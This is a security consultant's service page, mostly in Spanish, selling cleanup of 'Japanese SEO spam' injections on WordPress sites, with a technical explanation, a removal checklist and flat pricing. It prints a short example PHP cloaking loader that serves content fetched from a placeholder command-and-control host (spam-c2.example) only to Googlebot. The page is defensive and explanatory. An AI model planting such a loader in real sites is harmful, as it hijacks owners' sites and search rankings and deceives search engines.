threatover Patrik Grobshäuser

Japanese SEO spam · cloaked · cleaned

Japanese SEO spam removal.

Eliminación manual de la inyección de spam SEO japonés. Limpieza de archivos y base de datos. Purga del sitemap. Vector de entrada identificado. Solicitudes de reconsideración enviadas. Tarifa plana $279.

Mechanism

Qué es el 'spam SEO japonés', técnicamente.

Un atacante planta un loader PHP en tu sitio (normalmente en wp-content/plugins/ o wp-content/uploads/). El loader genera miles de páginas sintéticas con keywords japonesas y títulos de producto japoneses. Reescribe tu sitemap para que Googlebot las encuentre. Los visitantes reales nunca ven el spam — el loader comprueba el User-Agent y sirve tu sitio normal a los humanos.

Para cuando te das cuenta, Google ha indexado cientos o miles de URLs en japonés en tu dominio. Search Console envía un aviso de seguridad por email. El posicionamiento cae. La etiqueta 'Hacked: Content injection' aparece en Search Console.

Typical cloaking loader
01 <?php
02 // Serve spam only to Googlebot. Real users see the normal site.
03 if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {
04     $payload = file_get_contents('https://spam-c2.example/jp/' . $_SERVER['REQUEST_URI']);
05     echo $payload;
06     exit;
07 }

What I remove

Cada lugar donde se esconde esta infección.

  • File loaders

    PHP ofuscado en plugins, mu-plugins, temas y uploads. Leemos los diffs, no los nombres de archivo.

  • Database

    Contenido spam inyectado en wp_posts, entradas autoloaded maliciosas en wp_options, wp_usermeta sospechoso.

  • Sitemap

    Entradas sintéticas generadas en el sitemap eliminadas; sitemap limpio regenerado y reenviado a Search Console.

  • Htaccess

    Reglas de reescritura en .htaccess y nginx que redirigen Googlebot o rutas concretas — revertidas.

  • Admin users

    Cuentas de administrador durmientes creadas por el loader — eliminadas. Todos los secrets de admin restantes rotados.

  • Entry vector

    Plugin vulnerable o credencial robada identificados y cerrados. Sin este paso, el mismo agujero se reutiliza en semanas.

Precios

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Iniciar limpieza

Monitoring

$29 / mo

per site, cancel any time

Monitorización continua, endurecimiento, una limpieza al año incluida.

Protégete

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Ver todos los servicios →

Correo [email protected] or use the contact form.